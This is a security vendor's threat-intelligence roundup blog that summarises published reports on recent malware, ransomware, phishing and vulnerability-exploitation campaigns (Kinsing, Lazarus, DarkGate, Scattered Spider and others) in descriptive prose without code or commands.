Our Application and Threat Intelligence Research Center has been busy over the summer, creating simulations in our Threat Simulator product of the latest cyber threats. In this month’s blog we discuss new threat campaigns, the latest Ransomware and Malware attacks.
Threat Simulator replicates these real-world threats, allowing you to safely and proactively test your controls to ensure that your security posture is prepared, armed with identifiable Indicators of Compromise (IOC).
To find out more information on how Keysight can help you rapidly find, remediate, and validate exploitable security vulnerabilities before they become headline news visit our website.
New Threat Campaigns
Kinsing Malware Exploits Novel Openfire Vulnerability
Aquasec released an article describing how threat actors exploited CVE-2023-32315 found in Openfire servers, to deploy malicious plugins and finally execute the Kinsing malware.
The vulnerability is represented by the possibility of a normal user to access or interact with files and privileged application modules outside the user’s scope by tampering with system components which store location paths to the aforementioned files.
Attackers exploit this vulnerability, known as path traversal, to create a new administrator profile and deploy malicious Java plugins which in the end download Kinsing malware and crypto miners.
Lazarus Group’s infrastructure reuse leads to discovery of new malware
Talos presented the shift of Lazarus group to other malware programs such as CollectionRAT, Deimos C2 and Trojanized Plink to achieve persistence and remote access on victim systems.
CollectionRAT has been linked to Lazarus due to its signed certificate being the same of a previously used malware called Jupiter/EarlyRAT. It gains system information of victim’s system and deploys implants delivered as Microsoft Foundation Class (MFC) which is an alternative binary format similar to a DLL. Implants are firstly decrypted and unwrapped from this format and then executed.
Deimos C2 is an open-source communication tool able to execute commands issued by C2 server, credential dumping and self-destruction.
Lastly, Plink is a network tool used to build reverse tunnels for a more obfuscated communication pattern.
Why LaZagne Makes D-Bus API Vigilance Crucial
Unit42 has published a report about the use of LaZagne malware in combination with the D-Bus mechanism in order to extract sensitive data from running applications.
Threat actors have chosen D-Bus APIs as a target because they facilitate communication between applications and services, potentially exposing sensitive data which can be later exploited with different hacktools. They used LaZagne stealer in order to fetch account credentials from those APIs, being a tool with high effectiveness in capturing passwords and enabling further exploitation.
DarkGate reloaded via malvertising and SEO poisoning campaigns
Malwarebytes has published a report about a new campaign that focuses on a new version of DarkGate malware which lures users to fraudulent websites.
The threat actor used malvertising for this campaign and techniques suchs as SEO poisoning which takes advantage of the recommendations algorithm, pushing malicious decoy pages on top of the search results. These pages then download the DarkGate malware to the victim’s computer and some of them even had implemented advanced fingerprinting checks.
The Tale of Two Exploits – Breaking Down CVE-2023-36884 and the Infection Chain
Trellix published their findings regarding the exploitation of CVE-2023-36884 in executing remote code through specifically crafted Microsoft Office documents.
The malicious documents acted as official papers related to the Ukraine World Congress respecting the Open eXtensible Markup Language (OOXML) format. An embedded Rich Text Format (RTF) component is also present inside the document and linked through an obscure method called Alternate Format Chunk rather than the more popular and easier to detect Object Linking and Embedding (OLE).
The RTF part contains URLs to remote malicious payloads that the victim may be tricked into downloading.
Flax Typhoon using legitimate software to quietly access Taiwanese organizations
Microsoft has published a report about a campaign made by the Flax Typhoon, a chinese threat actor which relies on the vulnerabilities of the operating system’s tools to perform cyber espionage on Taiwanese organizations.
The treat actor uses known vulnerabilities in different public-facing services such as VPN, Java, SQL application and others to inject web shell payload which allows for remote code execution. Then it proceeds to download and run pieces of malware to obtain local system privileges.
Once Flax Typhoon has obtained administrator privileges, it starts the process of establishing a connection to the CC server by disabling network-level authentication and chaning the Sticky Keys binary. The actor can launch the Terminal, create memory dumps, and take nearly any other action on the compromised system. It downloads SoftEther VPN to establish the connection to the CC.
Finally, the threat actor downloads malware in order to conduct credential access activities. Flax Typhoon targets the Local Security Authority Subsystem Service (LSASS) process memory and Security Account Manager (SAM) registry hive, and also enumerates restore points used by System Restore.
Threat Actor Employs PowerShell-Backed Steganography in Recent Spam Campaigns
Cyble Research and Intelligence Labs has released a report about a new method that threat actors use to exploit a vulnerability and spread Remote Access Tools to the victim’s computers.
Initially, the threat actor sends a spam email containing an Excel attachment that once opened, it exploits a vulnerability in the equation editor to initiate the download of a VB script payload. This script undergoes a process of de-obfuscation that automatically runs a PowerShell code which in the end downloads a JPG file.
This file includes Base64 encoded malware data that once it is parsed by the PowerShell script, it proceeds to inject into the victim’s computer RATs, such as Remcos, AgentTesla or LimeRAT.
Tunnel Warfare: Exposing DNS Tunneling Campaigns using Generative Models – CoinLoader Case Study
Check Point released an article documenting how CoinLoader malware uses covert DNS tunneling communication to discreetly exchange information with attacker-controlled DNS servers.
Check Point discovery of CoinLoader operations is due to a state-of-the-art deep-neural network security tool called DeepDNS that identified previous anomalous domains linked to CoinLoader.
CoinLoader is a malware loader with anti-analysis features such as obfuscation and junk code insertion. This malware includes tiny data fragments related to the victim inside DNS queries towards controlled DNS servers.
CoinLoader is observed to be delivered by attackers inside archives and is executed by DLL sideloading techniques.
Analysis of MS-SQL Server Proxyjacking Cases
AhnLab has found out that attackers that gain control over public-facing MS-SQL servers through dictionary attacks by brute-forcing passwords, deploy proxyware and cryptocurrency miners.
Once attackers successfully guess the user credentials of a MS-SQL server, they download a .NET executable compiled using a novel mechanism provided in the newest versions of .NET framework. This mechanism makes the process of malware investigation more difficult.
The executable is just a control module which downloads proxyware such as Traffmonetizer, IPRoyal, Proxtyrack or PacketStream. In addition, crypto miners are also deployed, most notably XMRig.
Traders’ Dollars in Danger: CVE-2023-38831 zero-Day vulnerability in WinRAR exploited by cybercriminals to target traders
Group-IB disclosed their findings regarding the abuse of CVE-2023-38831 zero-day vulnerability to send victims specially crafted zip archives that execute malware instead of benign files.
The vulnerability is a logical error in how the WinRAR searches for files inside an archive. If an attacker includes 2 similar named files, they can force the archiver to ignore the correct target document and extract the next in line, which during an attack, would be the malware itself.
This technique has been observed to deploy backdoors such as DarkMe, GuLoader and Remcos by tricking users into opening an image file. However, the image file is ignored and a batch script with a similar name is executed.
Unveiling the Stealthy Exploitation of Microsoft CMSTP Using Malicious LNK Files
Cyble discovered the use of LNK files, generated using a malware build tool called “Quantum Lnk Builder”, to download further attack stages and exploit the Connection Manager Profile Installer Windows application to open a proxy connection to the C2 server.
Since Office document macros have been disabled, attackers orientated towards other executable file formats which can carry the attack scenario.
Such LNK files are being delivered through phishing emails and prepare other stages by downloading various PowerShell malware loaders. By constructing a new configuration file used by Connection Manager, attackers bypass User Account Control mechanism and deploy Blank Grabber, Redline Staler or NetSupport RAT.
Scarabs colon-izing vulnerable servers
ESET researchers released an article regarding a new Turkish threat group labeled as CosmicBeetle employing a custom-made framework and other third-party tools to compromise systems and deliver the Scarab ransomware.
The initial step is considered to be the exploitation of CVE-2020-1472 ZeroLogon vulnerability using a .NET tool. The tool also downloads and executes a batch and Visual Basic scripts used to patch the targeted system with specific Microsoft updates. Researchers state, with low confidence, that some FortiOS vulnerabilities may have been exploited as well.
The custom-made framework consists of 3 components, all of them written in Delphi. The first one downloads third-party tools and initiates communication with the C2 server. The second one, deploys and installs the third component. Lastly, the third module works as a backdoor, starts victim reconnaissance and deploys the Scarab ransomware.
The ransomware is also developed in Delphi, encrypts files with specific extensions and replaces crypto wallet addresses stored in clipboard memory with attacker-controlled addresses in order to hijack impending transactions.
From Conti to Akira | Decoding the Latest Linux & ESXi Ransomware Families
SentinelOne published an article presenting the state of monitored ransomware such as MONTI, Akira, Trigona and Abyss Locker and their spreading towards Linux and VMWare ESXI systems.
All ransomware applications presented have different preferred victim profiles, encryption algorithms and attacking options, however, they all share similarities and borrow code from previous known samples of Babuk, Conti, HelloKitty and PolyVice ransomware.
Agniane Stealer: Dark Web’s Crypto Threat
Zscaler ThreaLabz published a report regarding the discovery of a new information stealer called Agniane Stealer, linked to the Malware-as-a-Service platform Cinoshi Project.
The malware is developed in C# and obfuscated and packed using various tools such as EasyCrypter, PackLab and ConfuserEx.
It showcases various features such as anti-analysis techniques that make the program terminate itself if is run inside a debugger, or if the victim system is emulated inside a malware sandbox environment. Moreover, it can investigate if popular tools used by researchers are being used and end itself discreetly without doing any malicious action.
Regarding stealing capabilities, it can gather credentials stored in Chrome browser or find session cookies in Telegram, Discord, WinSCP, Steam and OpenVPN. In addition, it collects significant hardware information from the victim system.
Profile Stealers Spread via LLM-themed Facebook Ads
TrendMicro has released a report about the use of large language models as a mean to make fake ads on Facebook and spread malicious software.
The threat actor used this new AI models to make fake ads, promising the users to give them access to powerful tools such as Bard AI, “Meta AI”. These ads contain a shortened link which redirects to Google Drive or Dropbox in order to download a zip file.
The zip file contains a simple MSI installer that once run, it starts to install Chrome extensions. These are information stealers which target cookies, account status, IPs and others.
Carderbee: APT Group use Legit Software in Supply Chain Attack Targeting Orgs in Hong Kong
Threat Hunter Team by Symantec released a report about a series of attacks on multiple organizations by a new threat actor which uses legitimate tools to carry them out.
The threat actor used Cobra DocGuard, a Chinese product which protects, encrypts and decrypts software, to spread its malicious files. More than that, a downloader which had a digitally signed certificate from Microsoft, called Microsoft Windows Hardware Compatibility Publisher, was used to download a malicious zipfile.
The archive contains an executable which acts as a dropper for different drives, creating services and registry entries. The injected payload is the Korplug backdoor malware.
Scattered Spider: The Modus Operandi
Trellix presented a detailed report about multiple campaigns of a threat group known as Scattered Spider/UNC3944/Scatter Swine/Muddled Libra/Roasted 0ktapus targeting various industries such as critical infrastructure and telecommunications.
Their campaigns include the use of 2 rogue Windows drivers (STONESTOP and POORTRY) used to terminated endpoint solutions on victim systems and deploy further malware.
In addition, they exploit several vulnerabilities such as CVE-2015-2291 (close security software and bypass detection) or CVE-2021-35464 (execute remote code on Apache Tomcat instances hosted on AWS).
Their malicious attempts also evolved to social engineering tactics such as phishing or impersonating IT personnel.
XLoader’s Latest Trick | New macOS Variant Disguised as Signed OfficeNote App
SentinelOne published a report regarding the evolution of XLoader infostealer for MacOS platform, from a Java written form to C and Objective-C variant.
The newly discovered version is certified with an Apple developer signature that has been recently revoked, and masquerades as an office application under the name of OfficeNote.
Once executed, it gains persistence on the system, communicates with several C2 servers and attempts to read sensitive files being part of Chrome and Firefox browsers in order to steal credentials.
In addition, it possesses anti-debugging features and tries to bypass static analysis tools and endpoint security products.
Chinese Entanglement | DLL Hijacking in the Asian Gambling Sector
SentinelOne published an article presenting details of a Chinese threat group labeled as BRONZE STARLIGHT, delivering vulnerable genuine applications and backdoors to targets linked to gambling sector in Southeast Asia.
The initial artifacts used in the attacks are 2 .NET loaders, inspired by a tool called SharpUnhooker, which try to bypass endpoint defense and download, from Alibaba cloud buckets, the next stage.
Once the download completes, the archive is opened, containing genuine applications such as Microsoft Edge or Adobe Creative Cloud, vulnerable to load malicious libraries (DLLs) due to a wrongfully configured file location search order. The malicious DLLs use a loading technique called HUI and are shared between multiple Chinese threat actors.
In addition, the attackers stole in previous campaigns the signing key of Ivacy VPN, in order masquerade their malware as safe and benign applications.
The final step is the deployment of Cobalt Strike beacons for C2 communication.
Catching up with WoofLocker the most elaborate traffic redirection scheme to tech support scams
Malwarebytes released an article explaining a very complex and efficient web redirection framework named WoofLocker and its robust infrastructure which allow attackers to install malware through victim browsers.
The attackers leverage the use of compromised websites to inject hidden JavaScript code directly in the victim browser’s DOM in order to fingerprint visitors and choose potential victims.
A victim candidate is one that does not use a virtual machine or specific browser plugins such as GeoEdge or McAfee WebAdvisor or web debugging tools like Fiddler.
Further exchange data between attacker’s infrastructure and victims is hidden inside pictures using steganography procedures.
Finally, victims are redirected to other websites and tricked to install various programs.
Analysis of APT Attack Cases Targeting Web Services of Korean Corporations
Ahnlab has published a comprehensive report about some techiques and various Chinese tools used by threat actors making ATP attacks on Korean web services.
The threat actor started by exploiting a vulnerability on the affected corporation’s website where it uploaded a web shell meant to deliver privilege escalation malware, such as Potato malware. This malware allowed them to make attacks on the target’s IIS servers or MS-SQL database servers.
To maintain persistence, the threat actors used the web shells to create processes such as displaying unauthorized advertisement pages on the company’s website, creating web shells and installing new malware. This new malware grants administrator privileges to the threat actor’s account, allowing it to perform malicious activities.
After that, using the new privileges granted, the threat actors installs malware tools such as Mimikatz or Runas to collect credentials from the infected systems.
More than that, the threat actor used web shells to install NetCat for remote control or Ladon as an open-source hacking tool used primarily by Chinese-speaking threat actors. It can enable them to carry out a range of malicious behaviors, including scanning, privilege escalation, and exfiltration of account credentials, after gaining control of the targeted system.
Mass-spreading campaign targeting Zimbra users
Welivesecurity by ESET blogpost has published a report on a phishing campaign targeting small and medium businesses and governmental entities on Zimbra platform.
First, the users receive an email warning about an email server update, account deactivation or similar issues, with an HTML attachment. When clicked, it opens a fake login page customized according to the targeted organization from where the threat actor can steal the victim’s credentials.
Some of the phishing email came from legitimate companies which indicates the fact that the attackers could have already compromised some administrator accounts.
Ransomware Roundup – Trash Panda and A New Minor Variant of NoCry
Fortinet presented details on the Trash Panda ransomware and a new minor variant of NoCry ransomware.
Even though is still unknown how Trash Panda ransomware is being spread, its behavior is similar to other ransomware programs. It only encrypts files whose extension appears into the ransomware target list. Additionally, it changes the desktop wallpaper and creates a file explaining how to recover the files. Interestingly, an additional political message in the ransom note can be found, meaning that the ransomware is used against a certain group or country.
NoCry ransomware is compiled and built with a custom builder, allowing attackers to include anti-VM, anti-emulation, bypass debugging and sandbox detection capabilities. NoCry allows user to either pay the ransom and receive their files or pay for a custom decryptor posing as a genuine product of a cybersecurity company.
Raccoon Stealer Announce Return After Hiatus
Cyberint released a report regarding the return of Raccoon Stealer, after the arrest of one of its creators.
Raccoon Stealer is known to have been built for unlawful commercial purposes such as Malware-as-a-Service, being highly specialized in exfiltrating credentials and secrets from almost 60 applications but with the downside of not having any deception or defense bypass capabilities. Customers that buy this information stealer combine Raccoon Stealer with third-party obfuscators, malicious loaders or droppers in order for their attacks to succeed.
Raccoon Stealer is capable of gathering browsing history, cookies, crypto wallets information. Besides the classical approach of investigating browser data, it can search for known installed desktop applications, capture encrypted files containing credentials used in said applications, download the required genuine application libraries to decrypt such files and exfiltrate credentials to the C2 server.
Moreover, the attacker can capture screenshots or inject further payloads to be executed after the stealing process is done.
Monti Ransomware Unleashes a New Encryptor for Linux
TrendMicro has released a report on Monti ransomware, a Windows and Linux-based encryptor which is a improved version of Conti ransomware.
This new variant employs new ways of enhancing the functionality of the old variant, suchs as parameters for terminating the virtual machines or encryption checkers used by the ransomware.
MoustachedBouncer: Espionage against foreign diplomats in Belarus
ESET Research presented a new threat actor named MoustachedBouncer that has targeted foreign embassies in Belarus using surveillance equipment installed by Russian and Belarusian security services into ISP infrastructure. The research team raised some concerns that this threat actor has collaborated with another group named Winter Vivern.
The main strategy employed is through adversary-in-the-middle attack, where the attackers can change the default routing rules in an ISP infrastructure to their own policies. This results in redirects of benign URLs to malicious remote hosts.
Initial infection is by redirecting traffic from a genuine URL distributing Windows updates to a malicious one masquerading a Microsoft domain.
Two major modular backdoors are delivered (Disco – written in Go and NightClub- written in C++), and are responsible for keylogging, screen captures, audio captures, privilege escalation through CVE-2021-1732.
Data exfiltration is accomplished through redirections inside the ISP infrastructure and no C2 servers have been observed.
FortiGuard AI Detects Continued OSS Supply Chain Hidden in Python Package Index
Fortiguard has published a report about malicious Python packages discovered by an AI engine assistant.
These packages contain encrypted malware that tries to steal information such as credit cards, wallets, credentials and others, or install additional malware.
ProxyNation: The dark nexus between proxy apps and malware
AT&T published a continuation report regarding the AdLoad campaign and its effects, more specifically the proxy client delivered through it.
The proxy client can target both Windows and MacOS platforms, however the Windows variant is undetectable by antivirus products since it is signed with a valid certificate.
The application is written in Go and is delivered through a popular and free installer named Inno Setup. The proxy client gathers system information in order to increase its traffic performance and allows attackers to remotely control the machine.
When a Zero Day and Access Keys Collide in the Cloud: Responding to the SugarCRM Zero-Day Vulnerability
Unit42 uncovered an incident starting from a zero-day vulnerability (CVE-2023-22952) in SugarCRM which resulted in compromising an entire enterprise cloud infrastructure hosted in AWS.
The exploit succeeds into executing remote PHP code, compromising the underlying server running the SugarCRM instance. Since these servers are virtual machines hosted in AWS, attackers have accessed, through the AWS command line, other services and resources.
Attackers downloaded and used Pacu, an open-source AWS exploitation framework, and Scout Suite, a cloud security audit tool, in order to gather information about the infrastructure and organization.
Afterwards, attackers moved laterally through the organization to the Relational Database Service, in order to steal customer information, or to the EC2 service to create additional machines for C2 communication.
Exploring New Techniques of Fake Browser Updates Leading to NetSupport RAT
Trellix uncovered several incidents similar to the SocGholish campaign, which take control of victim systems through fake Chrome browser updates.
Attackers previously used compromised sites to trick users into downloading fake Chrome browser updates in the form of zip archives. Once unarchived, a JavaScript file is executed which further downloads several Visual Basic scripts and batch files. In the end the remote administration tool called NetSupport is installed which grants an attacker complete control over the system.
Storm-0978 attacks reveal financial and espionage motives
Microsoft described the latest campaigns involving a Russian threat group known as Storm-0978 or RomCom or DEV-0978, which targeted government and military organizations in Europe, preponderantly Ukraine, and North America.
The group specializes in delivering malware through trojanized installers posing as genuine applications. However recent attacks also leveraged the CVE-2023-36884 vulnerability by succeeding in executing remote code via Word Documents.
Final stages of their attacks are either data extortion through deployed ransomware programs (Industrial Spy/Underground and Trigona) or cyber espionage by injecting the RomCom backdoor, finding credentials and moving laterally through the compromised network.
Common TTPs of attacks against industrial organizations. Implants for uploading data
Kaspersky released their third chapter research, focusing on data exfiltration tools observed during attacks involving industrial infrastructure.
While the first chapter presents ways of remote access and reconnaissance and the second chapter is centered on file gathering, the recent article presents ways of exfiltrating, as discrete as possible, information captured from the previous steps.
Their findings involve sending files to Dropbox or to other compromised remote hosts withing the company which then forward to the real C2 server.
Other clues uncovered manual attempts to send files using Yandex disk or 16 other file sharing services.
In addition, a malware implant would automatically build an email attached with sensible information and send it through Yandex email service.
Updated Kmsdx Binary Shows KmsdBot Is Targeting the IoT Landscape
Akamai released a report on KmsdBot malware campaign targeting IoT devices, now being on a fourth version, with an updated Kmsdx binary responsible for scanning random IP addresses for open SSH ports and attempting to log in to the system with a password list downloaded from a C2 server.
The malware downloads a text file with a list of credentials for different applications, containing a number of commonly used weak passwords and combinations of them. It is relevant for the IoT devices because most of them are left with the default credentials, making them attractive targets for threat actors to build a network of infected systems.
Focus on DroxiDat/SystemBC
Securelist published an article describing the use of a backdoor named DroxiDat along with a penetration testing tool called Cobalt Strike, to compromise industrial infrastructure.
DroxiDat is a more compact backdoor variant of SystemBC, capable of gathering general system and hardware information and exfiltrate them towards a C2 server. In addition, it has capabilities to interact with the file system and modify registry hives. Moreover, it contains a mini-TOR client application for dark web browsing.
The Cobalt Strike beacons are varied and were manually added to the infected system through a previous credential stealing attack.
Old exploit kits still kicking around in 2023
Malwarebytes Labs discovered that exploit kits targeting Internet Explorer are still being developed and capable of delivering new malware.
The researched samples are RIG EK, malware used to drop on the victim system other complex malware such as Lumma Stealer and PurpleFox EK which is a framework with rootkit capabilities.
LummaC Stealer Leveraging Amadey Bot to Deploy SectopRAT
Cyble published an article about LummaC, an information stealer that deploys different malware on the victim’s computer which has the purpose to make the process even more difficult to combat.
The malware is initially distributed through phishing websites, being disguised as potential setup files promoted via YouTube. Once installed, it starts to collect data from the victim and send it to the C2 server.
Furthermore, LummaC starts to install Amadey bot malware which can also steal data and load additional malicious payloads, communicating with the C2 server and receiving commands from it. The primary feature of Amadey is its capability to deploy other payloads to all compromised computers.
Ultimately, SectopRAT is delivered to the victim’s computer and it can establish a concealed secondary desktop, manipulating browser sessions. SectopRAT is also equipped with anti-malware analysis mechanisms.
Mac systems turned into proxy exit nodes by AdLoad
AT&T released a report regarding the use of AdLoad malware to transform MacOS systems into infected proxy servers.
AdLoad is a considered to be an adware and bundleware, responsible with downloading, loading and executing next malicious stages of an attack.
The current researched scenario includes a proxy client application being delivered, as a payload, by AdLoad in order to transform the victim system into a peer-to-peer proxy node.
The malware collects hardware information about the system and decides if it is suited to be a working node. In addition, it communicates with multiple C2 servers for further instructions.
LOLKEK Unmasked | An In-Depth Analysis of New Samples and Evolving Tactics
SentinelOne released a report presenting details about the continuous evolution of a ransomware labeled as LOLKEK, targeting small and medium size companies.
LOLKEK can be described as ransomware that can be easily modified even by attackers with little technical knowledge. In addition, it can be bought at a much smaller price than other ransomware programs.
As features, it removes the volume shadow copies, in order to make the recovery effort impossible and then encrypts files and other pluggable devices.
Xurum: New Magento Campaign Discovered
Akamai researchers have discovered that multiple well-known vulnerabilities have been exploited to compromise webservers running Magento, framework used in e-commerce.
CVE-2022-24086 lets attackers inject a foreign template into the Magento engine in order to execute remote PHP code. Once exploited, the attackers download a versatile webshell from a public GitHub repository of a security researcher and execute it in memory.
Finally, the attackers can gather purchase history and credit card information.
Another vulnerability, CVE-2016-5195, has been used for privilege escalation.
Statc Stealer: Decoding the Elusive Malware Threat
Zsaler ThreatLabz published an article regarding a new information stealer family labeled as Statc Stealer, capable of gathering cookies, login credentials and other sensitive information stored in the browser.
The campaign starts from malicious Google advertisements which download, on the victim machine, an executable that configures the next malicious payloads to be deployed and executed.
The main program, Statc Stealer which is written is C++ and can only target the Windows platform, is brought on the victim system by a PowerShell downloader.
Besides information stealing, the malware has anti-analysis capabilities against sandbox environments which are frequently used for malware research.
The captured data is finally exfiltrated to the C2 server, disguised as HTTP requests.
GuLoader Malware Disguised as Tax Invoices and Shipping Statements (Detected by MDS Products)
Ahnlab has published a report about GuLoader malware being distribuited via email and used to install remote access tools.
The malware is disguised as tax invoices or shipping statements, and, once run, it can download malware such as Remcos, AgentTesla, Vidar and other remote access tools from the threat actor’s server.
The threat actor uses downloaders such as GuLoader to propagate commercial malware. This approach helps evade security products that rely on signature-based detection.
Distribution of Malware Disguised as Coin and Investment-related Content
Ahnlab has published a report about a malware that is distributed via an executable and a Word file, disguised with coin exchange and investment-related topics.
Firstly, the malware executables seem like normal Word document and PDF files, but they contain commands to access a specific URL, such that after executing a file, a normal document is generated and a script code present in the malicious URL is executed. It’s behavior is not known.
The document file has the text color in the body set to gray, manipulating users into clicking the Enable Content button. Upon clicking this button, the code embedded in the document is executed and it downloads another script.
Currently, the exact script that is ultimately executed cannot be identified due to the C2 being inaccessible. However, it has the potential for various malicious behaviors such as exfiltrating user credentials and downloading additional malware.
TargetCompany Ransomware Abuses FUD Obfuscator Packers
TrendMicro discovered a novel attack pattern which employs the use of Remcos remote access trojan, TargetCompany ransomware and fully undetectable binary packers.
The attack originates from vulnerable SQL servers in which attackers can perform remote code execution, deploy and run the Remcos RAT, gain persistence and download the next stages.
Since Remcos and TargetCompany ransomware can be detected by antivirus solutions, a custom-made packer in the form of a batch file is used to decrypt the binary payloads of the aforementioned programs.
The attacker also downloads third-party tools such as Metasploit, IOBIT unlocker and many more.
Comrades in Arms? | North Korea Compromises Sanctioned Russian Missile Engineering Company
SentinelLabs has published a report about an intrusion into the Russian missile engineering organization NPO Mashinostroyeniya by a North Korean threat actor.
The threat actor used a malicious file named OpenCarrot, which is a Windows OS backdoor, also being used in the past by the Lazarus group. This version can connect to a C2 server directly to the external server through the internal network hosts.
The report states that the threat actor was likely operating on the compromised Russian server for an extensive period of time before their team discovered it in May 2022, when it paused all operations until February 2023.
For malware delivery, the threat actor communicated with a domain that impersonates Daily NK, a prominent South Korean online news outlet that provides independent reporting on North Korea.
New threat actor targets Bulgaria, China, Vietnam and other countries with customized Yashma ransomware
Talos published an article regarding the use of Yashma ransomware strain by a Vietnamese group.
The ransomware is a rebranded version of Chaos ransomware, and it is written in .NET.
In order to evade detection, the ransom note is not embedded into the malicious binary sample, but it is downloaded from a remote GitHub repository once the ransomware starts its execution. In addition, it presents anti-recovery features, by deleting the original unencrypted files.
Latest Batloader Campaigns Use Pyarmor Pro for Evasion
Trend Micro has published a report about a threat actor using Batloader acces malware with Pyarmor Pro in order to obfuscate its primary malicious python scripts.
It starts the action chain by including an action script in a large MSI file. It will check if it has admin rights to the victim machine and if not, it will execute a command from a corrupted file. Once it has obtained admin rights, it will install WinRAR and expand two archives that contain files used by the malware.
One obfuscated python script from the archive will map the victim’s IP address to the C2 server, after that it will receive dangerous payload from the remote server.
STRRAT’s Latest Version Incorporates Dual Obfuscation Layers
Cyble published a report regarding the use of a Java-based, double obfuscated remote access trojan, called STRRAT to steal credentials stored in browsers and capture keystrokes.
The initial infection vector starts from phishing emails containing a PDF file embedded with an URL. If the victim clicks on a special icon within the document, a JavaScript dropper is downloaded from the mentioned URL. The script later deploys the STRRAT malware.
This program is obfuscated using 2 tools (Allatori and Zelix KlassMaster) in order to hinder the investigation process.
It also achieves persistence on the system and gathers sensitive information which is later exfiltrated to the C2 server. Some variants also include a ransomware module called Crimson.
Ransomware Roundup – DoDo and Proton
Fortinet has warned users of 2 ransomware programs known as DoDo and Proton, describing their features and behavior.
DoDo ransomware is a variant of Chaos ransomware and has been observed to be delivered as a masqueraded educational-purpose and open-source information stealer called Mercurial Grabber. DoDo presents a very destructive attribute: it wipes files bigger than 1MB, deeming them unrecoverable even when the ransom is paid.
The spread of the Proton ransomware is still under investigation. Once executed, it encrypts file and changes their icons.
Both ransomware only target Windows platform.
Sophisticated SiMay RAT Spreads Via Telegram Phishing Site
Cyble published an article warning about a trojanized Telegram installer infecting Chinese systems in order to deploy a remote access tool and steal sensitive information.
The initial step is represented by a Telegram installer bundled with a malicious executable considered to be a downloader for the attack’s further stages. The downloading technique identified is unique and utilizes several web requests through intermediate URLs in order to find the final URL storing the next malware programs.
The next stages consist of deploying and executing a remote access tool that can capture keystrokes, screenshots and interact with the file system.
Midnight Blizzard conducts targeted social engineering over Microsoft Teams
Microsoft has published a report about a threat actor that uses compromised Microsoft 365 tenants to create domains that appear as technical support entities.
Firstly, it sends to the user a message request on Teams from an external user pretending to be a technical support or security team. It tries to convince them to enter a code into the Microsoft Authenticator app.
Then, the threat actor is granted a token to authenticate as the targeted user, gaining access to the victim’s account. This allows the threat actor to perform cyber espionage and information theft.
From cookie theft to BEC: Attackers use AiTM phishing sites as entry point to further financial fraud
Microsoft has published a report about a phishing campaign using AiTM phishing sites to achieve financial fraud.
The attacker sends emails to different users saying that they had received a voice message.
That mail contains an attachment that redirects to an intermediate page which checks if the user came from the original HTML attachment. Next, the user lands on a phishing page that proxied Azure Active Directory sign-in page. There the target inputs their credentials, authenticates and is redirected to the legitimate office.com page. However, in the background, the attacker intercepts the credentials.
While the credentials are stolen, the attacker uses AiTM technique to deploy a proxy server between the user and the website which allows them to extract the session cookie.
In the end, the attacker uses the stolen session cookie to authenticate to mailbox and perform payment frauds. This can be achieved by hijacking and replying to ongoing finance-related email threads, luring the target to send money through fake invoices.
Reptile Malware Targeting Linux Systems
Ahnlab has published a report about an open-source Linux kernel mode rootkit malware named Reptile that provides a concealment feature for files, directories, processes, and network communications.
It’s installation provides a listener command line tool that waits connection details to a port. It has a reverse shell that connects to a C2 Server and allows threat actors to easily take control of systems.
The reverse shell can be triggered either at install time or by using Port Knocking and waiting for a Magic Packet to be received on a specific port.
Reptile also provides a feature where it can give the current user root privileges and it can hide or show files, directories, PIDs and TCP/UDP network communications, based on commands received from the C2 Server.
Sliver C2 Being Distributed Through Korean Program Development Company
Ahnlab has published a report about fake VPN installers that distribute Silver C2.
Once the installers are on the victim’s computer, they download Silver C2 which allows the threat actor to control the infected system. In order to run Silver C2, Notepad.exe is used for process injection.
Worth mentioning is that some installer files are disguised as font files, but they are actually malicious installers and some of them are being signed with a valid company certificate.
Sneaky XWorm Uses MultiStaged Attack
Cyble published a report regarding a novel technique to deploy and execute a commodity malware named XWorm, in such a way that minimizes detection.
The initial stage is represented by a LNK file attached to phishing emails. Once executed it starts a complex multi-stage attack which employs as many genuine existing programs as possible to execute decrypted payloads from the LNK file. For example, PowerShell, batch files (BAT), cmd and VBScript were mainly used.
XWorm is capable of monitoring keystrokes and mouse activity, use webcam, microphone and capture screenshots, listen for network connections and many more.